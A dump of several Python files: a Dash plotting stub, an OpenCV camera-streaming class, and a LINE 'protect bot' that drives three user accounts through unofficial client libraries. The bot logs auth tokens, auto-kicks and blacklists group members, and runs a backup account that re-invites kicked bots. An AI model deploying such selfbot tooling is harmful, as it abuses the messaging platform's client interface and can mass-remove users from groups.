df1 = pd.DataFrame(data, columns=['timestep', 'Energy'])
fig = df1.plot(x= 'timestep', y='Energy',template = 'plotly_dark')
else:
fig = go.Figure(data=[go.Scatter(x=[], y=[])])
fig.layout.template = 'plotly_dark'
#fig.show()
return(fig)
# def run():
# app.scripts.config.serve_locally = True
# app.run_server(port = 8069, dev_tools_ui=True, debug=False,
# dev_tools_hot_reload =True, threaded=False)
# s = Process(target=run)
# s.start()
webbrowser.open('http://127.0.0.1:8069/')
app.scripts.config.serve_locally = True
app.run_server(port = 8069, dev_tools_ui=True, debug=False,
dev_tools_hot_reload =True, threaded=False)
|
StreamCameraVideo.py
|
# import the necessary packages
from threading import Thread
import cv2
import time
import datetime
import logging
from CameraSettings import CameraSettings
from CameraMemory import CameraMemory
"""
Implement a camera based video stream.
Tested on Raspberry Pi 3B, 3B+, 4, Windows 10 Thinkpad T570, and two logitech USB cams.
"""
class StreamCameraVideo(): #--------------------------------
def __init__(self, camera_name='0', camera_settings=None, camera_memory=None):
self.logger = logging.getLogger(__name__)
self.logger.info(__name__)
self.stream = cv2.VideoCapture(int(camera_name)) # setup stream
self.camera_memory = CameraMemory(camera_memory) # remember memory type and camera settings
self.camera_settings = CameraSettings(self.stream,camera_settings)
self.starttime = 0 # keep track of some metrics
self.stoptime = 0
self.stopped = True
self.frame_count = 1
self.width=640
self.height=480
self.read_fps = 30.0
if self.stream.isOpened() == False:
self.logger.error("couldn't open camera:"+ camera_name)
self.camera_memory.write((-2,None,""))
return
def config(self, params):
# params is dict like: {'camera_type': 'camera', 'camera_name': '0', 'camera_memory': ['deque', ' 100', '1'],
# 'camera_settings': [['CAP_PROP_AUTO_EXPOSURE', '.75']], 'read_fps': 30.0, 'width': 1280, 'height': 720}
if params == None:
return
self.camera_type = params['camera_type']
self.camera_name = int(params['camera_name'])
self.camera_memory = None
self.camera_memory = CameraMemory(camera_memory=params['camera_memory'])
self.camera_settings = None
cs = params['camera_settings']
self.camera_settings = CameraSettings(self.stream,camera_settings=params['camera_settings'])
self.read_fps = float(params['read_fps'])
self.width = int(params['width'])
self.height = int(params['height'])
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT,self.height)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH,self.width)
self.stream.set(cv2.CAP_PROP_FPS,self.read_fps)
return
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name='StreamCameraVideo', args=())
t.daemon = True
self.starttime = time.time()
t.start()
time.sleep(1)
return self
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
self.stream.release()
return
def update(self):
self.stopped = False
# Loop
while True:
if self.stopped:
break
(ret, self.frame) = self.stream.read()
if not ret:
self.camera_memory.write((-1,self.frame, ""))
break
# always store frame number and timestamp with frame as Tuple (,,)
timestamp = datetime.datetime.now().strftime("%Y%m%d.%H%M%S")+".%07d"%self.frame_count
self.camera_memory.write((self.frame_count,self.frame,timestamp))
self.frame_count += 1
# stopped
self.stoptime = time.time()
def read(self):
# return the frame most recently read from memory
return self.camera_memory.read()
def settings(self,camera_settings=None):
res = self.camera_settings.settings(camera_settings)
#time.sleep(0.1)
return res
def memory(self,camera_memory=None):
res = self.camera_memory.memory(camera_memory)
#time.sleep(0.1)
return res
def stats(self):
duration = self.stoptime-self.starttime
fps = self.frame_count/duration
return 'stats:%s, duration:%f, frame_count:%d, FPS:%.2f' % (__name__,duration,self.frame_count,fps)
# Test -------------------------------------
def main():
cv2.namedWindow("TestStreamCameraVideo", cv2.WINDOW_NORMAL)
cv2.resizeWindow("TestStreamCameraVideo", 1280,720)
cv2.moveWindow("TestStreamCameraVideo", 100,100)
# read from a camera
camera_memory = ['frame', 1]
#camera_settings = [["CAP_PROP_AUTO_EXPOSURE", .75],['CAP_PROP_BRIGHTNESS',250.0]]
camera_settings = [["CAP_PROP_FRAME_WIDTH", 1280],[cv2.CAP_PROP_FRAME_HEIGHT,720]]
camera = StreamCameraVideo(0,camera_settings, camera_memory)
camera.start()
i=0
previous = -3
while True:
(num, frame,timestamp) = camera.read()
if num == 0:
continue
if previous==num:
time.sleep(0.02)
continue
previous = num
if num == -1: # finished
break
cv2.imshow("TestStreamCameraVideo",frame)
print(timestamp)
key = cv2.waitKey(1) & 0xFF
if key == ord('q') or key == 27:
break
i += 1
camera.stop()
cv2.destroyAllWindows()
print(camera.stats())
print("main read ",i)
if __name__ == '__main__':
main()
|
main.py
|
'''
┏━━━━━━━━━━━━━━━━━
┣ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.
┣ ©2020 ᴍᴏ-ʙᴀɴᴢᴜ
┗━━━━━━━━━━━━━━━━━
'''
from linepy import *
from akad.ttypes import *
from akad.ttypes import Message
from akad.ttypes import ContentType as Type
from akad.ttypes import TalkException
from akad.ttypes import IdentityProvider, LoginResultType, LoginRequest, LoginType
from akad.ttypes import LiffChatContext, LiffContext, LiffSquareChatContext, LiffNoneContext, LiffViewRequest
from akad.ttypes import ChatRoomAnnouncementContents
from akad.ttypes import Location
from akad.ttypes import ChatRoomAnnouncement
from thrift import transport, protocol, server
from thrift.Thrift import *
from thrift.unverting import *
from thrift.TMultiplexedProcessor import *
from thrift.TSerialization import *
from thrift.TRecursive import *
from thrift import transport, protocol, server
from thrift.protocol import TCompactProtocol, TMultiplexedProtocol, TProtocol
from thrift.transport import TTransport, TSocket, THttpClient, TZlibTransport
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, time, timeit, livejson,asyncio, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, ctypes, urllib, traceback, tempfile, platform
from humanfriendly import format_timespan, format_size, format_number, format_length
from datetime import timedelta, date
from datetime import datetime
from threading import Thread, activeCount
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
_session = requests.session()
try:
import urllib.request as urllib2
except ImportError:
import urllib2
programStart = time.time()
a001 = LINE('EMAIL','PASSWORD')
print('》》》》UNIT 001 READY《《《《')
a002 = LINE('EMAIL','PASSWORD')
print('》》》》UNIT 002 READY《《《《')
a003 = LINE('EMAIL','PASSWORD')
print('》》》》UNIT 003 READY《《《《\n')
a001.log("[ M001D23 ]\n" + str(a001.authToken))
a002.log("[ M002D23 ]\n" + str(a002.authToken))
a003.log("[ M003D23 ]\n" + str(a003.authToken))
print('\n━━━━━━━━━━━━━━━━━━━━━━━━━━━')
print('\n██████╗░██████╗░███████╗██╗\n██╔══██╗██╔══██╗██╔════╝██║\n██║░░██║██████╔╝█████╗░░██║\n██║░░██║██╔══██╗██╔══╝░░╚═╝\n██████╔╝██║░░██║███████╗██╗\n╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝')
print('\n》》》》PROGRAM STARTED《《《《\n')
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
M001D23 = a001.getProfile().mid
M002D23 = a002.getProfile().mid
M003D23 = a003.getProfile().mid
army = [a001,a002]
antijs = [a003]
oepoll = OEPoll(a001)
call = a001
loop = asyncio.get_event_loop()
status = livejson.File('status.json', True, False, 4)
with open("settings.json","r",encoding="utf-8") as fp:
settings = json.load(fp)
creator = status["creator"]
owner = status["owner"]
admin = status["admin"]
staff = status["staff"]
mybots = status["mybots"]
blacklist = status["blacklist"]
promax = status["promax"]
strictmode = status["strictmode"]
Bots = [M001D23,M002D23,M003D23]
Botslist = [a001,a002,a003]
resp1 = a001.getProfile().displayName
resp2 = a002.getProfile().displayName
resp3 = a003.getProfile().displayName
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
helpCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.
┣ Protection
┣ Group
┣ Access
┣ Option
┣ Settings
┣ Reboot/Shutdown
┣━━━━ ©2020 ᴍᴏ-ʙᴀɴᴢᴜ
┗━━━━━━━━━━━━━━━━━'''
proCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ Protection
┣ Kick/Invite [ Mention ]
┣ Protect [ Max/None ]
┣ Strictmode [ On/Off ]
┣ Protectlist
┣ Checkbot
┣ Purge
┗━━━━━━━━━━━━━━━━━'''
groupCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ Group
┣ Ginfo
┣ Join
┣ Leave/Leave 1-3
┣ Invto [ Num ]
┣ Grouplist 1-3
┣ Mention/Tagall
┣ Memberlist/Pendinglist
┣ Openqr/Closeqr
┗━━━━━━━━━━━━━━━━━'''
accessCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ Access
┣ Blacklist/Banlist
┣ Clearban
┣ Abort/Eject
┣ Squad List
┣ View Bots/Access
┣ Add/Del Owner [ Mention ]
┣ Add/Del Admin [ Mention ]
┣ Add/Del Staff [ Mention ]
┣ Add/Del Squad [ Mention ]
┣ Add/Del Ban [ Mention ]
┣ Owner:Recruit/Expel
┣ Admin:Recruit/Expel
┣ Staff:Recruit/Expel
┣ Squad:Add/Del
┣ Ban:Add/Del
┗━━━━━━━━━━━━━━━━━'''
optCmd ='''┏━━━━━━━━━━━━━━━━━
┣━━━━ Option
┣ Allowliff
┣ Creator
┣ Respon/Ping
┣ Speed/Debug
┣ Me/About
┣ Mid/Mid [ Mention ]
┣ Contact [ Mention ]
┗━━━━━━━━━━━━━━━━━'''
setCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ Settings
┣ Changepict:1-3/All
┣ Changebio:1-3/All [ Bio ]
┣ Changename:1-3/All [ Name ]
┗━━━━━━━━━━━━━━━━━'''
aboutCmd ='''┏━━━━━━━━━━━┓ ▕ HΞLLTΞRHΞΛD ᴄᴏʀᴘ.
┃▏╰━╮┏┈┓╭━╯▕┃ ▕ Protect Bot
┃▏═━┈┫𐀀┣┈━═▕┃ ▕ v5.3
┃▏╭━╯┗┈┛╰━╮▕┃ ▕ ©2020 ᴍᴏ-ʙᴀɴᴢᴜ
┗━━━━━━━━━━━┛ ▕ github.com/hellterhead'''
dreX53 = '''██████╗░██████╗░███████╗██╗
██╔══██╗██╔══██╗██╔════╝██║
██║░░██║██████╔╝█████╗░░██║
██║░░██║██╔══██╗██╔══╝░░╚═╝
██████╔╝██║░░██║███████╗██╗
╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝'''
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
for hlth in Botslist:
for xdrex in Bots:
try:
hlth.findAndAddContactsByMid(xdrex)
except:
pass
def backupData():
try:
backup = settings
f = codecs.open('settings.json','w','utf-8')
json.dump(backup, f, sort_keys=True, indent=4, ensure_ascii=False)
return True
except:
pass
def restartProgram():
print('\n》》》》PROGRAM RESTARTED《《《《\n')
backupData()
python = sys.executable
os.execl(python, python, *sys.argv)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours,24)
weeks, days = divmod(days,7)
months, weeks = divmod(weeks,4)
text = ""
if months != 0: text += "%02d Months" % (months)
if weeks != 0: text += " %02d Weeks" % (weeks)
if days != 0: text += " %02d Days" % (days)
if hours != 0: text += " %02d Hours" % (hours)
if mins != 0: text += " %02d Minutes" % (mins)
if secs != 0: text += " %02d Seconds" % (secs)
if text[0] == " ":
text = text[1:]
return text
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def logError(text):
a001.log("[ ERROR ] {}".format(str(text)))
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.now(tz=tz)
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
time = "{}, {} - {} - {} | {}".format(str(hasil), str(inihari.strftime('%d')), str(bln), str(inihari.strftime('%Y')), str(inihari.strftime('%H:%M:%S')))
with open("logError.txt","a") as error:
error.write("\n[ {} ] {}".format(str(time), text))
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def sendMention(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@dreMention"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
a001.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def sendTemplate(to, data):
xyz = LiffChatContext(to)
xyzz = LiffContext(chat=xyz)
view = LiffViewRequest('1602687308-GXq4Vvk9', xyzz)
token = a001.liff.issueLiffView(view)
url = 'https://api.line.me/message/v3/share'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % token.accessToken
}
data = {"messages":[data]}
requests.post(url, headers=headers, data=json.dumps(data))
def allowLiff():
url = 'https://access.line.me/dialog/api/permissions'
data = {
'on': [
'P',
'CM'
],
'off': []
}
headers = {
'X-Line-Access': a001.authToken,
'X-Line-Application': a001.server.APP_NAME,
'X-Line-ChannelId': '1602687308',
'Content-Type': 'application/json'
}
requests.post(url, json=data, headers=headers)
def sendFooter(receiver, text):
label = settings["label"]
icon = settings["iconUrl"]
link = settings["linkUrl"]
data = {
"type": "text",
"text": text,
"sentBy": {
"label": "{}".format(label),
"iconUrl": "{}".format(icon),
"linkUrl": "{}".format(link)
}
}
sendTemplate(receiver, data)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def kick(group, target):
try:
asd = a001.kickoutFromGroup(group, [target])
if asd != None:
hlthfail
except:
try:
asd = a002.kickoutFromGroup(group, [target])
if asd != None:
hlthfail
except:
pass
def cancel(group, target):
try:
asd = a001.cancelGroupInvitation(group, [target])
if asd != None:
hlthfail
except:
try:
asd = a002.cancelGroupInvitation(group, [target])
if asd != None:
hlthfail
except:
pass
def invite(group, target):
try:
a001.findAndAddContactsByMid(target)
asd = a001.inviteIntoGroup(group, [target])
if asd != None:
hlthfail
except:
try:
a002.findAndAddContactsByMid(target)
asd = a002.inviteIntoGroup(group, [target])
if asd != None:
hlthfail
except:
pass
def lockqr(group):
try:
G = a001.getGroup(group)
G.preventedJoinByTicket = True
asd = a001.updateGroup(G)
if asd != None:
hlthfail
except:
try:
G = a002.getGroup(group)
G.preventedJoinByTicket = True
asd = a002.updateGroup(G)
if asd != None:
hlthfail
except:
pass
def join(group):
try:
a001.acceptGroupInvitation(group)
except:
try:
a002.acceptGroupInvitation(group)
except:
pass
def reject(group):
try:
a001.rejectGroupInvitation(group)
except:
try:
a002.rejectGroupInvitation(group)
except:
pass
def backup(group, target):
try:
a001.inviteIntoGroup(group, [target])
if target == M002D23:
a002.acceptGroupInvitation(group)
except:
try:
a002.inviteIntoGroup(group, [target])
if target == M001D23:
a001.acceptGroupInvitation(group)
except:
pass
def antijs(group, target):
a003.acceptGroupInvitation(group)
a003.kickoutFromGroup(group, [target])
try:
a003.inviteIntoGroup(group, [M001D23,M002D23])
a001.acceptGroupInvitation(group)
a002.acceptGroupInvitation(group)
time.sleep(3)
a003.leaveGroup(group)
except:
pass
def blacklist(target):
try:
if target in creator or target in owner or target in admin or target in staff or target in mybots or target in Bots:
pass
else:
if target in status["blacklist"]:
pass
else:
status["blacklist"].append(target)
except:
pass
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def logspeed():
get_profile_time_start = time.time()
get_profile = a001.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_profile_took = time.time() - get_profile_time_start
return "[ Bots Speed ]\n- Took: %.3fms\n- Taken: %.5f" % (get_profile_took,get_profile_time)
get_profile_time_start = time.time()
get_profile = a002.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_profile_took = time.time() - get_profile_time_start
return "[ Bots Speed ]\n- Took: %.3fms\n- Taken: %.5f" % (get_profile_took,get_profile_time)
get_profile_time_start = time.time()
get_profile = a003.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_profile_took = time.time() - get_profile_time_start
return "[ Bots Speed ]\n- Took: %.3fms\n- Taken: %.5f" % (get_profile_took,get_profile_time)
def debug():
get_profile_time_start = time.time()
get_profile = a001.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = a001.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = a001.getContact(get_profile.mid)
get_contact_time = time.time() - get_contact_time_start
elapsed_time = time.time() - get_profile_time_start
return "[ Debug ]\n- Send Respon: %.5f\n- Get Profile: %.5f\n- Get Contact: %.5f\n- Get Group: %.5f" % (elapsed_time,get_profile_time,get_contact_time,get_group_time)
get_profile_time_start = time.time()
get_profile = a002.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = a002.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = a002.getContact(get_profile.mid)
get_contact_time = time.time() - get_contact_time_start
elapsed_time = time.time() - get_profile_time_start
return "[ Debug ]\n- Send Respon: %.5f\n- Get Profile: %.5f\n- Get Contact: %.5f\n- Get Group: %.5f" % (elapsed_time,get_profile_time,get_contact_time,get_group_time)
get_profile_time_start = time.time()
get_profile = a003.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = a003.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = a003.getContact(get_profile.mid)
get_contact_time = time.time() - get_contact_time_start
elapsed_time = time.time() - get_profile_time_start
return "[ Debug ]\n- Send Respon: %.5f\n- Get Profile: %.5f\n- Get Contact: %.5f\n- Get Group: %.5f" % (elapsed_time,get_profile_time,get_contact_time,get_group_time)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def command(text):
xmobz = text.lower()
if settings['setKey']['status']:
if xmobz.startswith(settings['setKey']['key']):
cmd = xmobz.replace(settings['setKey']['key'],'')
else:
cmd = 'Undefined command'
else:
cmd = text.lower()
return cmd
def removeCmd(text, key=''):
if key == '':
setKey = '' if not settings['setKey']['status'] else settings['setKey']['key']
else:
setKey = key
text_ = text[len(setKey):]
sep = text_.split(' ')
return text_[len(sep[0] + ' '):]
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
async def mobanzu(op):
try:
if settings["restartPoint"] is not None:
a001.sendMessage(settings["restartPoint"],"[ Bots Operated Again... ]")
settings["restartPoint"] = None
if op.type == 0:
# print ("[ 0 ] END OF OPERATION")
return
if op.type == 11 or op.type == 122:
if op.type == 11: print ("[ 11 ] NOTIFIED UPDATE GROUP")
else: print ("[ 122 ] NOTIFIED UPDATE CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck1 = threading.Thread(target=lockqr, args=(op.param1,)).start()
fck2 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_1 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_2 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_3 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_4 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_5 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_6 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_7 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 == '4':
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_8 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
groupqr = a001.getGroup(op.param1)
if groupqr.preventedJoinByTicket == False:
d23X_9 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_10 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
groupqr = a002.getGroup(op.param1)
if groupqr.preventedJoinByTicket == False:
d23X_11 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_12 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 == '1':
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_13 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
groupn = a001.getGroup(op.param1).name
if groupn not in settings["changeGroupName"][op.param1]:
progn = a001.getGroup(op.param1)
progn.name = settings["changeGroupName"][op.param1]
a001.updateGroup(progn)
d23X_14 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progn = a001.getGroup(op.param1).name
settings["changeGroupName"][op.param1] = progn
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
groupp = a001.getGroup(op.param1).pictureStatus
if groupp not in settings["changeGroupPicture"][op.param1]:
progp = a001.getGroup(op.param1)
progp.pictureStatus = settings["changeGroupPicture"]
a001.updateGroupPicture(progp)
d23X_15 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progp = a001.getGroup(op.param1).pictureStatus
settings["changeGroupPicture"][op.param1] = progp
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
try:
groupn = a002.getGroup(op.param1).name
if groupn not in settings["changeGroupName"][op.param1]:
progn = a002.getGroup(op.param1)
progn.name = settings["changeGroupName"][op.param1]
a002.updateGroup(progn)
d23X_16 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progn = a002.getGroup(op.param1).name
settings["changeGroupName"][op.param1] = progn
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
groupp = a002.getGroup(op.param1).pictureStatus
if groupp not in settings["changeGroupPicture"][op.param1]:
progp = a002.getGroup(op.param1)
progp.pictureStatus = settings["changeGroupPicture"]
a002.updateGroupPicture(progp)
d23X_17 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progp = a002.getGroup(op.param1).pictureStatus
settings["changeGroupPicture"][op.param1] = progp
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
pass
if op.type == 13 or op.type == 124:
if op.type == 13: print ("[ 13 ] NOTIFIED INVITE INTO GROUP")
else: print ("[ 124 ] NOTIFIED INVITE INTO CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck3 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
fck4 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_18 = threading.Thread(target=blacklist, args=(op.param2,)).start()
d23X_19 = threading.Thread(target=blacklist, args=(op.param3,)).start()
try:
d23X_20 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_21 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_22 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_23 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_24 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_25 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_26 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_27 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_28 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_29 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_30 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_31 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_32 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_33 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_34 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_35 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_36 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_37 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if M001D23 in op.param3:
if settings["autoJoin"] == True:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
try:
d23X_38 = threading.Thread(target=join, args=(op.param1,)).start()
except:
pass
else:
try:
d23X_39 = threading.Thread(target=reject, args=(op.param1,)).start()
except:
pass
if M002D23 in op.param3:
if settings["autoJoin"] == True:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
try:
d23X_40 = threading.Thread(target=join, args=(op.param1,)).start()
except:
pass
else:
try:
d23X_41 = threading.Thread(target=reject, args=(op.param1,)).start()
except:
pass
if op.type == 17 or op.type == 130:
if op.type == 17: print ("[ 17 ] NOTIFIED ACCEPT GROUP INVITATION")
else: print ("[ 130 ] NOTIFIED ACCEPT CHAT INVITATION")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck5 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_42 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 19 or op.type == 133:
if op.type == 19: print ("[ 19 ] NOTIFIED KICKOUT FROM GROUP")
else: print ("[ 133 ] NOTIFIED DELETE OTHER FROM CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck6 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_43 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_44 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_45 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 in M001D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_46 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_47 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_48 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
d23X_49 = threading.Thread(target=antijs, args=(op.param1, op.param2)).start()
d23X_50 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in M002D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_51 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_52 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_53 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
d23X_54 = threading.Thread(target=antijs, args=(op.param1, op.param2)).start()
d23X_55 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in M003D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_56 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
